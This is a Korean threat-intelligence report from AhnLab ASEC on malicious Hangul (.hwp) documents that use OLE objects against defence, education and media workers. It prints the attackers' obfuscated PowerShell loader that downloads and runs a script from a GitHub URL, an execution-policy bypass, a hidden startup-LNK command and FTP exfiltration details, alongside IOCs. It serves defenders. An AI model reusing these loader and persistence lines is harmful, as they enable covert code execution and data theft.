AhnLab Security Emergency response Center(ASEC)은 국방, 언론 등 특정 분야의 관계자를 대상으로 하는 악성 OLE 개체가 삽입된 한글 문서(.hwp)를 확인하였다. 악성코드는 주로 메일에 삽입된 다운로드 URL 혹은 첨부 파일을 통해 유포되는 것으로 추정된다. 유포되는 문서의 파일명이 국방, 통일, 교육 및 방송 분야와 관련되어 있어 공격자는 해당 분야 관계자를 대상으로 악성코드를 유포하는 것으로 보인다.
본문에서 분석한 한글 문서는 크게 두 가지 유형으로, 외부 URL에 접속하는 유형과 추가 스크립트 파일을 생성하는 유형이 확인되었다. [유형 2]의 경우 기존 게시글[1] 에서 확인된 악성코드와 동작 방식이 유사하고 동일한 FTP 서버 Password를 사용하는 것으로 보아 같은 제작자로 추정된다.
각 유형의 간략한 동작 과정은 다음과 같다.
<유형 1>
이 유형은 한글 문서에 삽입된 OLE 개체를 통해 외부 URL에 접속하는 유형이다. 해당 유형으로 추정되는 한글 문서의 파일명은 다음과 같다.
| 날짜 | 파일명 |
|---|---|
| 2023.05.25 | 통일** 큐시트5월29일 월.hwp |
| 2023.05.25 | 20230508_교수회의자료_양식변경.hwp |
| 2023.05.25 | (***)2023-05-30 교수회의 자료.hwp |
| 2023.05.30 | 지불확인서(*** 소장).hwp |
| 2023.05.30 | (양식)축의, 조의_지불확인서.hwp |
| 2023.06.22 | 20230512_명박시나리오_세부.hwp |
| 2023.06.22 | 1-1.전담조직 내 연구지원 별도기능 설치(**대학원대학교 산학협력단).hwp |
| 2023.06.22 | 후** *** 전 총리 명예박사 수여식 총장님 참고자료.hwp |
| 2023.06.23 | [교원연수부-489 (첨부)] [붙임3] 강사카드(서식).hwp |
| 2023.06.29 | 정쟁에 희생되고 있는 국가안보 수호기능.hwp |
| 2023.07.11 | 통일**2023년4월30일(일).hwp |
| 2023.07.17 | 특집 북한의 축산업과 삶의 질 조**.hwp |
| 2023.07.20 | 42- 바그너의 교훈 (2023. 8).hwp |
| 2023.07.24 | [서식1] 사업비 교부신청서.hwp |
| 2023.08.14 | 논문심사서 (권**).hwp |
| 2023.09.01 | 인센티브 증빙서류 **.hwp |
| 2023.09.04 | 통일**9월6일최종수요일.hwp |
| 2023.09.06 | 김**_사례비 지급명세서.hwp |
| 2023.09.19 | [양식_붙임5]_추천자_확인서_양식-전**.hwp |
[표 1]에서 확인된 한글 문서에는 OLE 개체가 실행될 수 있도록 문서 본문에 클릭을 유도하는 문구가 삽입되어 있다.
공격자는 문서 내부에 다음과 같이 페이지 범위를 넘어서는 크기의 OLE 개체를 삽입하여 사용자가 어느 곳을 선택해도 OLE 개체가 실행되도록 하였다.
삽입된 OLE 개체 내부에는 5MB 이상의 더미 바이트와 함께 악성 URL이 존재한다. 이로 인해 사용자가 OLE 개체 클릭 시 개체 내부에 존재하는 악성 URL로 접속을 시도한다.
분석 당시 URL에 접속되지 않아 이후 행위는 확인되지 않았다. 현재까지 확인된 악성 URL은 다음과 같으며 문서마다 서로 다른 파라미터 값을 사용하는 것으로 보아 특정한 사용자를 대상으로 문서를 유포하는 것으로 추정된다.
- hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[특정 값]
- hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[특정 값]
<유형2>
한글 문서에 악성 스크립트 파일이 삽입된 유형으로 최종적으로 github에 업로드된 추가 스크립트 코드를 실행한다. 이 유형으로 추정되는 한글 문서의 파일명은 다음과 같다.
| 날짜 | 파일명 |
|---|---|
| 2023.07.31 | test.hwp |
| 2023.07.27 | 사례비정보_aa.hwp |
| 2023.08.31 | 자문요청.hwp |
| 2023.09.01 | 사례비 양식.hwp |
| 2023.09.14 | main.hwp |
| 2023.10.04 | test1.hwp |
| 2023.10.04 | cna[q].hwp |
[표 2]에서 확인된 ‘test1.hwp’ 문서에는 2개의 파일이 첨부되어 있고 해당 스크립트 파일(zz.bat)을 실행하는 하이퍼링크가 삽입되어 있다.
한글 문서 실행 시 zz.bat과 oz.txt 파일이 %temp% 폴더에 생성되고 사용자가 하이퍼링크가 삽입된 빈칸 또는 zz.bat 파일 아이콘 클릭 시 zz.bat 파일이 실행된다.
zz.bat은 oz.txt에 존재하는 Github 주소에 접속하여 추가 데이터를 다운로드 및 실행하는 파워쉘 명령어가 존재한다.
따라서 zz.bat 실행 시 최종적으로 hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt 에 접속하여 악성 스크립트를 실행한다.
[그림10]에서 확인된 down.txt, info.txt, upload.txt는 모두 난독화된 데이터가 업로드되어 있어 해당 URL 접속 시 특정 키값으로 복호화 하여 실행한다.
hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt 에 업로드된 파워쉘 스크립트에는 4개의 함수가 존재한다. 각 함수의 간략한 기능은 다음과 같다.
| 함수명 | 기능 |
|---|---|
| mainFunc | 파워쉘 정책 변경 getinfo – uploadResult – downCommand 순으로 함수 실행 |
| getinfo | hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt에 업로드 된 스크립트 실행 네트워크 설정 정보 등 사용자 PC 정보 수집 |
| uploadResult | hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt 에 업로드 된 스크립트 실행 공격자 FTP 서버에 수집한 정보 업로드 |
| downCommand | hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt에 업로드 된 스크립트 실행 추가 악성 파일 생성 |
가장 먼저 실행되는 mainFunc 함수는 아래 명령어를 통해 현재 사용자의 파워쉘 정책을 변경하여 추후 다운로드하는 파워쉘 스크립트가 실행될 수 있도록 한다.
- Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass –Force
getinfo 함수는 hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt에 업로드되어 있는 난독화된 스크립트를 실행한다.
복호화된 info.txt 스크립트는 사용자 정보를 수집하는 기능을 수행한다. 수집된 정보는 %APPDATA%\Ahnlab\Ahnlab.hwp 파일에 저장된다.
수집하는 정보는 다음과 같다.
| 명령어 | 수집 정보 |
|---|---|
| Get-ChildItem ([Environment]::GetFolderPath(“Recent”)) | 최근 사용한 파일 목록 |
| ipconfig /all | 네트워크 설정 목록 |
| Get-process | 프로세스 목록 |
uploadResult 함수 역시 hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt 에 업로드되어있는 난독화된 스크립트를 실행한다.
복호화된 upload.txt 스크립트는 정보를 수집한 파일(%APPDATA%\Ahnlab\Ahnlab.hwp)을 공격자에게 전송 후 삭제한다. 공격자는 탈취한 정보를 수집하기 위해 FTP를 사용하였다.
- 주소 : plm.myartsonline[.]com
- 사용자명 : 4154836
이후 지속적으로 실행되는 downCommand 함수는 hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt 에 업로드되어있는 난독화된 스크립트를 실행한다.
down.txt는 악성코드의 지속성 유지를 위한 추가 악성 파일을 생성한다. 공격자는 악성 스크립트가 지속적으로 실행될 수 있도록 시작 프로그램 폴더에 링크 파일(LNK)을 생성한다.
생성된 링크 파일에는 thumbs.log 파일을 실행하는 커맨드가 포함되어 있다. thumbs.log에는 hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt에 업로드된 스크립트를 실행하는 파워쉘 명령어가 존재한다.
이로 인해 사용자가 PC를 재 시작할 때마다 hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt에 업로드 된 스크립트가 실행된다.
- LNK 파일 command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log‘);invoke-expression $x} - thumbs.log 데이터
[string]$a = {(New-Object Net.WebClient).Doqwertyutring(‘hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt‘)};$b=$a.replace(‘qwertyu’,’wnloadS’);$c=iex $b;invoke-expression $c
현재까지 사용자 정보 수집 외에 추가적인 악성 행위는 확인되지 않았지만 hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt 에 업로드 되는 명령어에 따라 다양한 악성 행위가 수행될 수 있다.
본문에서 설명한 유형 외에도 지난 6월 발행한 게시글[2] 의 악성코드 역시 한글 문서를 통해 유포되는 등 최근 악성 한글 문서가 다수 확인되고 있다. 사용자는 한글 문서 열람 시 문서 작성자와 발신자에 주의해야한다.
[파일 진단]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)
[IOC]
-hwp
2f0a67b719d8303c0ec7cc9057ed8411
af5bbab33f934dc016fc1aa0d910820e
7f3a30525b9324a2aeb32a9018df944f
361237b6b385874f02f3724ae50d1522
a242741873637fdac8f69f2ffdba47bc
-script
7284a6376aa79a2384f797769b7ce086
2ef182bced72da507d2e403ab9db3c9f
f416b44332b4fb394b4735634cb07ff2
c16796909d5feea709d99e306f7e9975
0217e70fd7bc3a65ee0f2dd60ff85fbf
d5d395d90ccf9a7309f2f64169a2c019
8cafe74f03605a9bfaea5081b3ed0fc2
4934226f319d82ae092ada2525a7feb5
1061425d7e3d054a79f9294a2118b5da
2773acee87413790e9ace99c536c78ad
77edb140b86596eabe3602bb7febb997
-C2
hxxp://host.sharingdocument.one/dashboard/explore/starred?hwpview=
hxxp://mail.smartprivacyc.com/get/account/view?myact=
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보